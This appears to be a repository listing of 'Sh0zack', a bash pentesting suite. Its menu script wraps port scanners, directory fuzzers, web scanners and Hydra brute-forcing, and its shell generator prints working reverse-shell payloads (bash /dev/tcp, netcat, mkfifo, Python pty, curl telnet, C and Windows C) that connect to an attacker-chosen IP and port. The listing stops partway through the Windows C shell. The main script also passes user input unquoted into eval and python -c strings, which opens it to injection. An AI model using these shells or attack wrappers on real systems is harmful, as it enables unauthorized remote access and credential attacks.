 15 |         echo -e "${BOLD}${RED}Error: $1 command not found. Please install it.${RESET}"
 16 | # echo -e $(apt search $1 ||  snap search $1) # if u wanna expose availbale ones ( removed just to ensure u don't overwhelme urself)
 17 |         local sudochk=$(sudo -n true 2>&1)
 18 |         if [ "$?" -ne 0 ]; then
 19 |             echo -e "${RED}You need to have sudo privileges to install packages !!!.${RESET}"
 20 |             return 1
 21 |         fi
 22 |         if command -v apt &>/dev/null; then
 23 |             PKG_MANAGER="apt"
 24 |             INSTALL_CMD="apt install -y"
 25 |         elif command -v dnf &>/dev/null; then
 26 |             PKG_MANAGER="dnf"
 27 |             INSTALL_CMD="dnf install -y"
 28 |         elif command -v yum &>/dev/null; then
 29 |             PKG_MANAGER="yum"
 30 |             INSTALL_CMD="yum install -y"
 31 |         elif command -v pacman &>/dev/null; then
 32 |             PKG_MANAGER="pacman"
 33 |             INSTALL_CMD="pacman -S --noconfirm"
 34 |         else
 35 |             echo -e "${RED}No supported package manager found.${RESET}"
 36 |             return 1
 37 |         fi
 38 | 
 39 |         read -p "Do you want to install $1? (y/n): " install
 40 |         if [ "$install" = "y" ]; then
 41 |             echo -e "${GREEN}Installing $1...${RESET}"
 42 |             if sudo $INSTALL_CMD "$1"; then
 43 |                 echo -e "${GREEN}Successfully installed $1${RESET}"
 44 |                 return 0
 45 |             else
 46 |                 echo -e "${RED}Failed to install $1${RESET}"
 47 |                 return 1
 48 |             fi
 49 |         else
 50 |             echo -e "${RED}Please install $1 to use this tool properly${RESET}"
 51 |             return 1
 52 |         fi
 53 |     fi
 54 |     return 0
 55 | }
 56 | path() {
 57 |     local IFS=$'\n'
 58 |     COMPREPLY=($(compgen -f -- "${COMP_WORDS[COMP_CWORD]}"))
 59 | }
 60 | complete -F path read
 61 | 
 62 | help() {
 63 |     clear
 64 |     echo -e "${MAGENTA}╔═════════════════════════════════════════════════════════════╗${RESET}"
 65 |     echo -e "${MAGENTA}║            ${CYAN}${BOLD}Sh0zack Tool Suite - Help Guide           ${MAGENTA}║${RESET}"
 66 |     echo -e "${MAGENTA}╚═════════════════════════════════════════════════════════════╝${RESET}"
 67 |     echo
 68 |     echo -e "${YELLOW}QUICK START GUIDE:${RESET}"
 69 |     echo -e "${GREEN}1. Installation:${RESET}"
 70 |     echo -e "   First time setup: ${CYAN}sudo ./scripts/install.sh${RESET}"
 71 |     echo -e "   This will install all necessary dependencies and create required directories"
 72 |     echo
 73 |     echo -e "${YELLOW}COMMAND SHORTCUTS:${RESET}"
 74 |     echo -e "${GREEN}Full Command    Shortcut    Description${RESET}"
 75 |     echo -e "port scanner    p, port     Port scanning tools"
 76 |     echo -e "dns scanner     d, dns      DNS enumeration"
 77 |     echo -e "dir scanner     dir         Directory enumeration"
 78 |     echo -e "brute force     b, brute    Password attacks"
 79 |     echo -e "listener        l, listen   Reverse shell listener"
 80 |     echo -e "privesc         priv        Privilege escalation checks"
 81 |     echo -e "shell           s, shell    Reverse shell generator"
 82 |     echo -e "decrypt         dec         Decryption tools"
 83 |     echo -e "web scanner     w, web      Web vulnerability scanning"
 84 |     echo -e "ai tool         ai          AI assistant"
 85 |     echo -e "help            h, -h , ?       Show this help menu"
 86 |     echo -e "exit            q, quit     Exit the tool"
 87 |     echo
 88 |     echo -e "${YELLOW}USAGE EXAMPLES:${RESET}"
 89 |     echo
 90 |     echo -e "${GREEN}1. Port Scanner:${RESET}"
 91 |     echo -e "   ${CYAN}Example: port -t 192.168.1.1 -p 80,443${RESET}"
 92 |     echo -e "   ${CYAN}Example: port -t example.com --all-ports${RESET}"
 93 |     echo -e "   Available tools: nmap, rustscan, custom scanner"
 94 |     echo
 95 |     echo -e "${GREEN}2. DNS Scanner:${RESET}"
 96 |     echo -e "   ${CYAN}Example: dns -d example.com -w wordlist.txt${RESET}"
 97 |     echo -e "   Tools: gobuster dns, custom DNS tool"
 98 |     echo
 99 |     echo -e "${GREEN}3. Directory Scanner:${RESET}"
100 |     echo -e "   ${CYAN}Example: dir -u http://example.com -w wordlist.txt${RESET}"
101 |     echo -e "   ${CYAN}Example: dir -u http://example.com --recursive${RESET}"
102 |     echo -e "   Tools: gobuster dir, wfuzz, custom scanner"
103 |     echo
104 |     echo -e "${GREEN}4. Web Scanner:${RESET}"
105 |     echo -e "   ${CYAN}Example: web -u http://example.com --full-scan${RESET}"
106 |     echo -e "   ${CYAN}Example: web -u http://example.com --cms wordpress${RESET}"
107 |     echo -e "   Tools: nikto, OWASP ZAP, skipfish, wpscan, cmsmap"
108 |     echo
109 |     echo
110 |     echo -e "${YELLOW}COMMON SOLUTIONS:${RESET}"
111 |     echo
112 |     echo -e "${GREEN}1. Missing Dependencies:${RESET}"
113 |     echo -e "   Run: ${CYAN}sudo ./scripts/install.sh${RESET}"
114 |     echo
115 |     echo -e "${GREEN}2. Permission Denied:${RESET}"
116 |     echo -e "   Run tool with sudo: ${CYAN}sudo ./sh0zack.sh${RESET}"
117 |     echo
118 |     echo -e "${GREEN}3. API Key Issues:${RESET}"
119 |     echo -e "   Check: ${CYAN} the openai key ${RESET}"
120 |     echo -e "   Permissions: ${CYAN}./tools/ai.sh file ${RESET}"
121 |     echo
122 |     echo -e "${GREEN}4. Wordlist Not Found:${RESET}"
123 |     echo -e "   Default lists in: ${CYAN}./sh0zack/tools${RESET}"
124 |     echo -e "   Download more: ${CYAN}./scripts/get-wordlists.sh${RESET}"
125 |     echo
126 |     echo -e "${YELLOW}TOOL LOCATIONS:${RESET}"
127 |     echo -e "Main Script:     ${CYAN}./sh0zack.sh${RESET}"
128 |     echo -e "Tools Directory: ${CYAN}./tools/${RESET}"
129 |     echo -e "Wordlists:       ${CYAN}./scripts/wordlists/${RESET}"
130 |     echo -e "Payloads:         ${CYAN}./payloads/${RESET}"
131 |     echo -e "Scripts:         ${CYAN}./scripts/${RESET}"
132 |     echo
133 |     echo
134 |     echo -e "${YELLOW}OUTPUT FORMATS:${RESET}"
135 |     echo -e "- Text files (.txt)"
136 |     echo -e "- HTML reports"
137 |     echo -e "- JSON format"
138 |     echo -e "- XML output"
139 |     echo
140 |     echo -e "${YELLOW}PERFORMANCE TIPS:${RESET}"
141 |     echo -e "1. Use threaded scans: ${CYAN}-t <number>${RESET}"
142 |     echo -e "3. Target specific ports: ${CYAN}-p <ports>${RESET}"
143 |     echo -e "4. Use custom wordlists for faster scans"
144 |     echo
145 |     echo -e "${YELLOW}SAFETY NOTES:${RESET}"
146 |     echo -e "- Always have permission to scan targets"
147 |     echo -e "- Use --delay option for rate limiting"
148 |     echo -e "- Check local laws and regulations & use vpn if needed"
149 |     echo -e "- Backup important results"
150 |     echo
151 |     echo
152 |     echo -e "${YELLOW}SUPPORT:${RESET}"
153 |     echo -e "Github:     ${CYAN}https://github.com/sh0z3n/Sh0zack ${RESET}"
154 |     echo -e "Issues:     ${CYAN}https://github.com/sh0z3n/Sh0zack/issues ${RESET}"
155 |     echo -e "Wiki:       ${CYAN}https://github.com/sh0z3n/Sh0zack/wiki ${RESET}"
156 |     echo
157 |     echo -e "${YELLOW}Note :${RESET}"
158 |     echo -e "${RED}Rest of tools like xss , sqli detection and waf bypass will be comitted soon \n i really appreciate forking and submiting pull requests to suggest some modificaitons (most will be approved within a day)${RESET}"
159 |     echo -e "${YELLOW}Press Enter to return to main menu${RESET}"
160 |     read
161 | }
162 | 
163 | display_main_menu() {
164 |     clear
165 |     echo -e "${MAGENTA}╔══════════════════════════════════╗${RESET}"
166 |     echo -e "${MAGENTA}║         ${CYAN}${BOLD}Sh0zack Tool Suite       ${MAGENTA}║${RESET}"
167 |     echo -e "${MAGENTA}╚══════════════════════════════════╝${RESET}"
168 |     echo ""
169 |     echo -e "${YELLOW}1. ${GREEN}${BOLD} Port Scanning${RESET}"
170 |     echo -e "${YELLOW}2. ${GREEN}${BOLD} DNS Enumeration${RESET}"
171 |     echo -e "${YELLOW}3. ${GREEN}${BOLD} Directory Fuzzer${RESET}"
172 |     echo -e "${YELLOW}4. ${GREEN}${BOLD} Brute Force attack${RESET}"
173 |     echo -e "${YELLOW}5. ${GREEN}${BOLD} Listener Setter${RESET}"
174 |     echo -e "${YELLOW}6. ${GREEN}${BOLD} Privilege Escalation Check${RESET}"
175 |     echo -e "${YELLOW}7. ${GREEN}${BOLD} Shell Generator${RESET}"
176 |     echo -e "${YELLOW}8. ${GREEN}${BOLD} Decrypting tools ${RESET}"
177 |      echo -e "${YELLOW}9. ${GREEN}${BOLD} Web Scanner${RESET} "
178 |     echo -e "${YELLOW}10. ${GREEN}${BOLD}Ai Chat ${RESET} "
179 |     echo -e "${YELLOW}11 ${RED}${BOLD} Exit${RESET}"
180 |     echo ""
181 | }
182 | 
183 | run_port_scanner() {
184 |     echo -e "${YELLOW}Port Scanner${RESET}"
185 |     echo -e "${YELLOW}Choose tool to use:${RESET}"
186 |     echo -e "${GREEN}1. Nmap${RESET}"
187 |     echo -e "${GREEN}2. Rustscan${RESET}"
188 |     echo -e "${GREEN}3. Shozack Port Scan Tool${RESET}"
189 |     read -p "Enter your choice: " tool_choice
190 | 
191 |     read -p "Enter target: " target
192 | 
193 |         if ! [[ "$target" =~ ^[a-zA-Z0-9.-]+$ ]]; then
194 |         echo -e "${RED}Invalid target format.${RESET}"
195 |         return 1
196 |     fi
197 |      if [[ -z "$target" ]]; then
198 |         echo -e "${RED}Target cannot be empty.${RESET}"
199 |         return 1
200 |     fi
201 | 
202 |     
203 | 
204 | if [[ -n "$tool_choice" && "$tool_choice" =~ ^[0-9]+$ ]]; then
205 |     if [ "$tool_choice" -eq 1 ]; then
206 |         cmd_ulach "nmap" || return
207 |         echo -e "${BLUE}Example Nmap usage: nmap -sV -p 1-65535 $target${RESET}"
208 |         read -p "Enter Nmap command options: " nmap_options
209 |         nmap $nmap_options $target
210 |     elif [ "$tool_choice" -eq 2 ]; then
211 |         cmd_ulach "rustscan" || return
212 |         echo -e "${BLUE}Example Rustscan usage: rustscan -a $target --ulimit 5000 -- -sV${RESET}"
213 |         read -p "Enter Rustscan command options: " rustscan_options
214 |         rustscan $rustscan_options $target
215 |     elif [ "$tool_choice" -eq 3 ]; then
216 |         echo -e "${BLUE}Example Shozack Port Scan Tool usage: ./tools/port-scanner.sh $target${RESET}"
217 |         read -p "Enter Shozack Port Scan Tool options: " shozack_options
218 |         ./tools/port-scanner.sh $target $shozack_options
219 |     else
220 |         echo -e "${RED}Invalid option.${RESET}"
221 |     fi
222 |     else
223 |     echo -e "${RED}Use one of the DAMN Numbers to choose \n${YELLOW}Don't be this DUMB ! ${RESET}" # don't be this dumb to enter a string
224 | fi
225 | }
226 | run_dns_scanner() {
227 |     echo -e "${YELLOW}DNS Scanner${RESET}"
228 |     echo -e "${YELLOW}Choose tool to use:${RESET}"
229 |     echo -e "${GREEN}1. Gobuster${RESET}"
230 |     echo -e "${GREEN}2. Advanced Sh0zack DNS Scan Tool${RESET}"
231 |     read -p "Enter your choice: " tool_choice
232 |     read -p "Enter URL: " url
233 |     read -e -p "Enter path to wordlist (leave empty for default): " wordlist
234 |     if [ -z "$url" ];then
235 |         echo -e "\n${RED} $BOLD You didn't provide a target URL , No scanning for you :(  ${RESET}"
236 |         return
237 |     fi
238 | 
239 |     if [ -z "$wordlist" ]; then
240 |         default_wordlist="tools/default_subdomains.txt"
241 |         if [ ! -f "$default_wordlist" ]; then
242 | 
243 |             if ! which curl >/dev/null 2>&1; then
244 |                 if [ "$EUID" -ne 0 ]; then
245 |                 echo "run as root" &&  exit 1 # just to ensure u get curl on ur machine
246 |                 fi
247 |                 #echo "curl not found, installing..." # this part is removed , thanks to somone at reddit who pointed it out 
248 |                 #sudo apt-get install -y curl 
249 |             fi
250 |             echo -e "${YELLOW}Default wordlist not found. Downloading...${RESET}"
251 |             curl -s "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt" -o "$default_wordlist"
252 |             if [ $? -ne 0 ]; then
253 |                 echo -e "${RED}Failed to download default wordlist. Please provide a wordlist you have locally.${RESET}"
254 |                 return
255 |             fi
256 |             echo -e "${GREEN}Default wordlist downloaded successfully.${RESET}"
257 |         else
258 |             echo -e "${GREEN}Using existing default wordlist.${RESET}"
259 |         fi
260 |         wordlist="$default_wordlist"
261 |     elif [ ! -f "$wordlist" ]; then
262 |         echo -e "${RED}Error: Wordlist file not found.${RESET}"
263 |         return
264 |     fi
265 | 
266 |     case $tool_choice in
267 |         1)  cmd_ulach "gobuster" || return;
268 |             echo -e "${BLUE}Running Gobuster...${RESET}"
269 |             echo -e "${BLUE}Your Gobuster usage: gobuster dns -d $url -w $wordlist${RESET}"
270 |             gobuster dns -d "$url" -w "$wordlist"
271 |             ;;
272 |         2)
273 |             echo -e "${BLUE}Running Advanced Sh0zack DNS Scan Tool...${RESET}"
274 |             read -p "Enter number of threads (default: 50): " threads
275 |             read -p "Enter timeout in seconds (default: 5): " timeout
276 |             read -p "Resolve IP addresses? (y/n, default: y): " resolve_ip
277 |             read -p "Enable verbose mode? (y/n, default: n): " verbose
278 |             read -p "Enter output file name (default: subdomain_results.txt): " output_file
279 | 
280 |             threads=${threads:-50}
281 |             timeout=${timeout:-5}
282 |             resolve_ip=${resolve_ip:-y}
283 |             verbose=${verbose:-n}
284 |             output_file=${output_file:-subdomain_results.txt}
285 | 
286 |             cmd_args="-u '$url' -w '$wordlist' -o '$output_file' -t $threads -T $timeout"
287 |             [ "$resolve_ip" = "n" ] && cmd_args="$cmd_args -n"
288 |             [ "$verbose" = "y" ] && cmd_args="$cmd_args -v"
289 | 
290 |             echo -e "${BLUE}Running command: ./tools/dns.sh $cmd_args${RESET}"
291 |             eval "./tools/dns.sh $cmd_args"
292 |             ;;
293 |         *)
294 |             echo -e "${RED}Invalid option.${RESET}"
295 |             ;;
296 |     esac
297 | #  you can uncomment this if you wanna delete the file after downloading it
298 | #     if [ "$wordlist" = "tools/default_subdomains.txt" ]; then
299 | #         rm "$wordlist"
300 | #     fi
301 | }
302 | run_dir_scanner() {
303 |     echo -e "${YELLOW}Directory Scanner${RESET}"
304 |     echo -e "${YELLOW}Choose tool to use:${RESET}"
305 |     echo -e "${GREEN}1. Gobuster${RESET}"
306 |     echo -e "${GREEN}2. WFuzz${RESET}"
307 |     echo -e "${GREEN}3. Advanced Sh0zack Directory Scan Tool${RESET}"
308 |     read -p "Enter your choice: " tc
309 |     read -p "Enter URL: " url
310 |     read -e -p "Enter path to wordlist (leave empty for default): " wl
311 | 
312 |     if [ -z "$url" ]; then
313 |         echo -e "\n${RED}${BOLD}You didn't provide a target URL. No scanning for you :( ${RESET}"
314 |         return
315 |     fi
316 | 
317 |     if [ -z "$wl" ]; then
318 |         dw="tools/default_dirlist.txt"
319 |         if [ ! -f "$dw" ]; then
320 |             if ! which curl >/dev/null 2>&1; then
321 |                 if [ "$EUID" -ne 0 ]; then
322 |                     echo -e "${RED}Run as root${RESET}" && exit 1
323 |                 fi
324 |                 #echo -e "${YELLOW}curl not found, installing...${RESET}"
325 |                 #sudo apt-get install -y curl
326 |             fi
327 |             echo -e "${YELLOW}Default worsudo apt-getdlist not found. Downloading...${RESET}"
328 |             curl -s "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt" -o "$dw"
329 |             if [ $? -ne 0 ]; then
330 |                 echo -e "${RED}Failed to download default wordlist. Please provide a wordlist you have locally.${RESET}"
331 |                 return
332 |             fi
333 |             echo -e "${GREEN}Default wordlist downloaded successfully.${RESET}"
334 |         else
335 |             echo -e "${GREEN}Using existing default wordlist.${RESET}"
336 |         fi
337 |         wl="$dw"
338 |     elif [ ! -f "$wl" ]; then
339 |         echo -e "${RED}Error: Wordlist file not found.${RESET}"
340 |         return
341 |     fi
342 | 
343 |     case $tc in
344 |         1)
345 |             cmd_ulach "gobuster" || return;
346 |             echo -e "${BLUE}Running Gobuster...${RESET}"
347 |             echo -e "${BLUE}Your Gobuster usage: gobuster dir -u $url -w $wl${RESET}"
348 |             gobuster dir -u "$url" -w "$wl"
349 |             ;;
350 |         2)  cmd_ulach "wfuzz" || return;
351 |             echo -e "${BLUE}Running WFuzz...${RESET}"
352 |             echo -e "${BLUE}Your WFuzz usage: wfuzz -c -z file,$wl --hc 404 $url/FUZZ${RESET}"
353 |             wfuzz -c -z file,$wl --hc 404 "$url/FUZZ"
354 |             ;;
355 |         3)
356 |             echo -e "${BLUE}Running Advanced Sh0zack Directory Scan Tool...${RESET}"
357 |             read -p "Enter number of threads (default: 50): " thrd
358 |             read -p "Enter timeout in seconds (default: 5): " to
359 |             read -p "Enable verbose mode? (y/n, default: n): " vb
360 |             read -p "Enter output file name (default: dir_results.txt): " of
361 | 
362 |             thrd=${thrd:-50}
363 |             to=${to:-5}
364 |             vb=${vb:-n}
365 |             of=${of:-dir_results.txt}
366 | 
367 |             ca="-u '$url' -w '$wl' -o '$of' -t $thrd -T $to"
368 |             [ "$vb" = "y" ] && ca="$ca -v"
369 | 
370 |             echo -e "${BLUE}Running command: ./tools/dir.sh $ca${RESET}"
371 |             eval "./tools/dir.sh $ca"
372 |             ;;
373 |         *)
374 |             echo -e "${RED}Invalid option.${RESET}"
375 |             ;;
376 |     esac
377 | }
378 | 
379 | 
380 | run_brute_force() {
381 |     echo -e "${YELLOW}Brute Force${RESET}"
382 |     echo -e "${YELLOW}Choose tool to use:${RESET}"
383 |     echo -e "${GREEN}1. Hydra${RESET}"
384 |     echo -e "${GREEN}2. Shozack Brute Force Tool${RESET}"
385 |     read -p "Enter your choice: " tool_choice
386 | 
387 |     read -p "Enter target: " target
388 |     read -e -p "Enter path to user wordlist: " user_wordlist
389 |     read -e -p "Enter path to password wordlist: " pass_wordlist
390 |     read -p "Enter number of threads: " threads
391 |     read -p "Enter service (e.g., ssh, ftp): " service
392 |     read -p "Enter port (optional): " port
393 |     read -e -p "Enter path to output file (optional): " output_file
394 |     if [ "$tool_choice" -eq 1 ]; then
395 |         cmd_ulach "hydra" || return;
396 |         echo -e "${BLUE}Example Hydra usage: hydra -L $user_wordlist -P $pass_wordlist -t $threads $service://$target${RESET}"
397 |         hydra -L $user_wordlist -P $pass_wordlist -t $threads $service://$target
398 |     elif [ "$tool_choice" -eq 2 ]; then
399 |         echo -e "${BLUE}Example Shozack Brute Force Tool usage: ./tools/brute-force.sh -t $target -u $user_wordlist -p $pass_wordlist -T $threads -s $service${RESET}"
400 |         ./tools/brute-force.sh -t $target -u $user_wordlist -p $pass_wordlist -T $threads -s $service
401 |     else
402 |         echo -e "${RED}Invalid option.${RESET}"
403 |     fi
404 | 
405 | }
406 | 
407 | run_listener() {
408 |     echo -e "${YELLOW}Listener${RESET}"
409 |     ./tools/listener.sh
410 | }
411 | 
412 | run_privesc_check() {
413 |     echo -e "${YELLOW}Privilege Escalation Check${RESET}"
414 |     ./tools/privesc.sh
415 | }
416 | 
417 | run_shell_generator() {
418 |     echo -e "${YELLOW}Shell Generator${RESET}"
419 |     ./tools/shell-generator.sh
420 | }
421 | 
422 | run_web_scanner() {
423 |     echo -e "${YELLOW}Web Scanner${RESET}"
424 |     read -p "Enter the target website URL: " web_target
425 | 
426 |     echo -e "${YELLOW}Choose web scanning tool:${RESET}"
427 |     echo -e "${GREEN}1. Nikto${RESET}"
428 |     echo -e "${GREEN}2. OWASP ZAP (command line)${RESET}"
429 |     echo -e "${GREEN}3. Skipfish${RESET}"
430 |     echo -e "${GREEN}4. WPScan (WordPress)${RESET}"
431 |     echo -e "${GREEN}5. CMSmap (WordPress and other CMS)${RESET}"
432 |     read -p "Enter your choice: " web_tool_choice
433 | 
434 |     case $web_tool_choice in
435 |         1)
436 |             echo -e "${BLUE}Running Nikto...${RESET}"
437 |             cmd_ulach "nikto" || return;
438 |             nikto -h "$web_target"
439 |             ;;
440 |         2)
441 |             echo -e "${BLUE}Running OWASP ZAP...${RESET}"
442 |             cmd_ulach "zap-cli" || return;
443 |             zap-cli quick-scan -s all -r "$web_target"
444 |             ;;
445 |         3)
446 |             echo -e "${BLUE}Running Skipfish...${RESET}"
447 |             cmd_ulach "skipfish" || return;
448 |             read -p "Enter output directory: " output_dir
449 |             skipfish -o "$output_dir" "$web_target"
450 |             ;;
451 |         4)
452 |             echo -e "${BLUE}Running WPScan...${RESET}"
453 |             echo -e "${YELLOW}Note: This is specific to WordPress sites.${RESET}"
454 |             cmd_ulach "wpscan" || return;
455 |             wpscan --url "$web_target" --enumerate p,t,u
456 |             ;;
457 |         5)
458 |             echo -e "${BLUE}Running CMSmap...${RESET}"
459 |             echo -e "${YELLOW}Note: This works for WordPress and other CMS.${RESET}"
460 |             cmd_ulach "cmsmap" || return;
461 |             cmsmap "$web_target"
462 |             ;;
463 |         *)
464 |             echo -e "${RED}Invalid option.${RESET}"
465 |             ;;
466 |     esac
467 | }
468 | 
469 | run_AI(){
470 | 	echo -e "${YELLOW}AI Tool ${RESET}"
471 | 	./tools/ai.sh
472 | }
473 | 
474 | run_decrypte() {
475 |     echo -e "${YELLOW}Decrypting tools${RESET}"
476 |     echo -e "${YELLOW}Choose decryption method:${RESET}"
477 |     echo -e "${GREEN}1. FROM Base64${RESET}"
478 |     echo -e "${GREEN}2. FROM Base32${RESET}"
479 |     echo -e "${GREEN}3. FROM Base85${RESET}"
480 |     echo -e "${GREEN}4. FROM Base58${RESET}"
481 |     echo -e "${GREEN}5. Vigenère${RESET}"
482 |     echo -e "${GREEN}6. ROT13${RESET}"
483 |     echo -e "${GREEN}7. ROT47${RESET}"
484 |     echo -e "${GREEN}8. Binary to Text${RESET}"
485 |     echo -e "${GREEN}9. Hexadecimal to Text${RESET}"
486 |     read -p "Enter your choice: " decrypt_choice
487 | 
488 |     case $decrypt_choice in
489 |         1)
490 |             read -p "Enter Base64 string to decrypt: " base64_input
491 |             cmd_ulach "base64" || return;
492 |             echo -n "$base64_input" | base64 -d
493 |             ;;
494 |         2)
495 |             read -p "Enter Base32 string to decrypt: " base32_input
496 |             cmd_ulach "base32" || return;
497 |             echo -n "$base32_input" | base32 -d
498 |             ;;
499 |         3)
500 |             read -p "Enter Base85 string to decrypt: " base85_input
501 |             cmd_ulach "base85" || return;
502 |             echo -n "$base85_input" | base85 -d
503 |             ;;
504 |         4)
505 |             read -p "Enter Base58 string to decrypt: " base58_input
506 |             cmd_ulach "base58" || return;
507 |             python3 -c "
508 | import base58
509 | print(base58.b58decode('$base58_input').decode())
510 | "
511 |             ;;
512 |         5)
513 |             read -p "Enter Vigenère encrypted text: " vigenere_input
514 |             read -p "Enter Vigenère key: " vigenere_key
515 |             python3 -c "
516 | import sys
517 | 
518 | def vigenere_decrypt(ct, key):
519 |     pt = ''
520 |     l = len(key)
521 |     for i, char in enumerate(ct):
522 |         if char.isalpha():
523 |             shift = ord(key[i % l].upper()) - ord('A')
524 |             if char.isupper():
525 |                 pt += chr((ord(char) - shift - 65) % 26 + 65)
526 |             else:
527 |                 pt += chr((ord(char) - shift - 97) % 26 + 97)
528 |         else:
529 |             pt += char
530 |     return pt
531 | 
532 | ct = '$vigenere_input'
533 | key = '$vigenere_key'
534 | print(vigenere_decrypt(ct, key))
535 | "
536 |             ;;
537 |         6)
538 |             read -p "Enter ROT13 string to decrypt: " rot13_input
539 |             echo "$rot13_input" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
540 |             ;;
541 |         7)
542 |             read -p "Enter ROT47 string to decrypt: " rot47_input
543 |             python3 -c "
544 | import codecs
545 | print(codecs.decode('$rot47_input', 'rot47'))
546 | "
547 |             ;;
548 |         8)
549 |             read -p "Enter binary string to decrypt (space-separated): " binary_input
550 |             python3 -c "
551 | binary = '$binary_input'.split()
552 | text = ''.join([chr(int(byte, 2)) for byte in binary])
553 | print(text)
554 | "
555 |             ;;
556 |         9)
557 |             read -p "Enter hexadecimal string to decrypt: " hex_input
558 |             python3 -c "
559 | hex_string = '$hex_input'
560 | text = bytes.fromhex(hex_string).decode('utf-8')
561 | print(text)
562 | "
563 |             ;;
564 |         *)
565 |             echo -e "${RED}Invalid option.${RESET}"
566 |             ;;
567 |     esac
568 | 
569 | 
570 | }
571 |     display_main_menu
572 | 
573 | while true; do
574 |     display_main_menu
575 |     echo -en "${CYAN}${PROMPT}${RESET}"
576 |     read -p " " choice
577 | 
578 |     case $choice in
579 |         0|h|-h|help|--help|-help) help ;;
580 |         1|port|scan) run_port_scanner ;;
581 |         2|dns) run_dns_scanner ;;
582 |         3|dir|fuzz) run_dir_scanner ;;
583 |         4|brute) run_brute_force ;;
584 |         5|listen) run_listener ;;
585 |         6|privesc) run_privesc_check ;;
586 |         7|shell) run_shell_generator ;;
587 |         8|cron) run_decrypte ;;
588 |         9|web) run_web_scanner;;
589 | 	10|Ai) run_AI;;
590 |         11|exit|quit|q|:wq) echo -e "${RED}Exiting Shozack !!!${RESET}"; exit 0 ;;
591 |         *) echo -e "${RED}Invalid option. Repeat your choice.${RESET}" ;;
592 |     esac
593 | 
594 |     echo
595 |     read -p "Press Enter to continue..."
596 | done
597 | 


--------------------------------------------------------------------------------
/tools/shell-generator.sh:
--------------------------------------------------------------------------------
   1 | #!/bin/bash
   2 | # this shell genreator is part of Shozack tool 
   3 | # Author : SH0z3n
   4 | 
   5 | # ANSI color codes
   6 | RED='\033[0;31m'
   7 | GREEN='\033[0;32m'
   8 | YELLOW='\033[0;33m'
   9 | BLUE='\033[0;34m'
  10 | MAGENTA='\033[0;35m'
  11 | CYAN='\033[0;36m'
  12 | RESET='\033[0m'
  13 | 
  14 | get_shell_code() {
  15 |     local shell_type=$1
  16 |     local shell_name=$2
  17 | 
  18 |     case "$shell_type" in
  19 |         "reverse")
  20 |             case "$shell_name" in
  21 |                 "Bash -i")
  22 |                     echo "bash -i >& /dev/tcp/$ip/$port 0>&1"
  23 |                     ;;
  24 |                 "Bash 196")
  25 |                     echo "0<&196;exec 196<>/dev/tcp/$ip/$port; sh <&196 >&196 2>&196"
  26 |                     ;;
  27 |                 "Bash read line")
  28 |                     echo "exec 5<>/dev/tcp/$ip/$port;cat <&5 | while read line; do $line 2>&5 >&5; done"
  29 |                     ;;
  30 |                 "Python3 shortest")
  31 |                     echo "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"$ip\",$port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/sh\")'"
  32 |                     ;;
  33 | 		        "Bash 5")
  34 | 		         echo "bash -i >& /dev/tcp/$ip/$port 0>&1"
  35 | 		            ;;
  36 | 		        "Bash udp")
  37 | 	        	echo "bash -i >& /dev/udp/$ip/$port 0>&1"
  38 |                 ;;
  39 | 		        "nc mkfifo")
  40 | 		    	echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $ip $port >/tmp/f"
  41 |                 ;;
  42 |                 "nc -e")
  43 |                 echo "nc $ip $port -e bash"
  44 |                 ;;
  45 |                 "nc.exe -e")
  46 |                 echo "nc.exe $ip $port -e bash";;
  47 |                 "BusyBox nc -e")
  48 |                 echo "busybox nc $ip $port -e bash";;
  49 |                 "nc -c")
  50 |                 echo "nc -c bash $ip $port";;
  51 |                 "ncat -e")
  52 |                 echo "ncat $ip $port -e bash";;
  53 |                 "ncat.exe -e")
  54 |                 echo "ncat.exe $ip $port -e bash";;
  55 |                 "ncat udp")
  56 |                 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|ncat -u $ip $port >/tmp/f";;
  57 |                 "curl")
  58 |                 echo "C='curl -Ns telnet://$ip:$port'; $C </dev/null 2>&1 | bash 2>&1 | $C >/dev/null";;
  59 |                 "rustcat")
  60 |                 echo "rcat connect -s bash $ip $port";;
  61 |                 "C")
  62 |                 echo "#include <stdio.h>
  63 | #include <sys/socket.h>
  64 | #include <sys/types.h>
  65 | #include <stdlib.h>
  66 | #include <unistd.h>
  67 | #include <netinet/in.h>
  68 | #include <arpa/inet.h>
  69 | 
  70 | int main(void){
  71 |     int port = $port;
  72 |     struct sockaddr_in revsockaddr;
  73 | 
  74 |     int sockt = socket(AF_INET, SOCK_STREAM, 0);
  75 |     revsockaddr.sin_family = AF_INET;       
  76 |     revsockaddr.sin_port = htons(port);
  77 |     revsockaddr.sin_addr.s_addr = inet_addr("$ip");
  78 | 
  79 |     connect(sockt, (struct sockaddr *) &revsockaddr, 
  80 |     sizeof(revsockaddr));
  81 |     dup2(sockt, 0);
  82 |     dup2(sockt, 1);
  83 |     dup2(sockt, 2);
  84 | 
  85 |     char * const argv[] = {"bash", NULL};
  86 |     execvp("bash", argv);
  87 | 
  88 |     return 0;       
  89 | }";;
  90 |             "C Windows")
  91 |             echo "#include <winsock2.h>
  92 | #include <stdio.h>
  93 | #pragma comment(lib,"ws2_32")
  94 | 
  95 | WSADATA wsaData;
  96 | SOCKET Winsock;
  97 | struct sockaddr_in hax; 
  98 | char ip_addr[16] = "$ip"; 
  99 | char port[6] = "$port";            
 100 | 
 101 | STARTUPINFO ini_processo;
 102 | 
 103 | PROCESS_INFORMATION processo_info;
 104 | 
 105 | int main()
 106 | {
 107 |     WSAStartup(MAKEWORD(2, 2), &wsaData);
 108 |     Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
 109 | 
 110 | 
 111 |     struct hostent *host; 
 112 |     host = gethostbyname(ip_addr);
 113 |     strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
 114 | 
 115 |     hax.sin_family = AF_INET;
 116 |     hax.sin_port = htons(atoi(port));
 117 |     hax.sin_addr.s_addr = inet_addr(ip_addr);
 118 | 
 119 |     WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
 120 | 
 121 |     memset(&ini_processo, 0, sizeof(ini_processo));
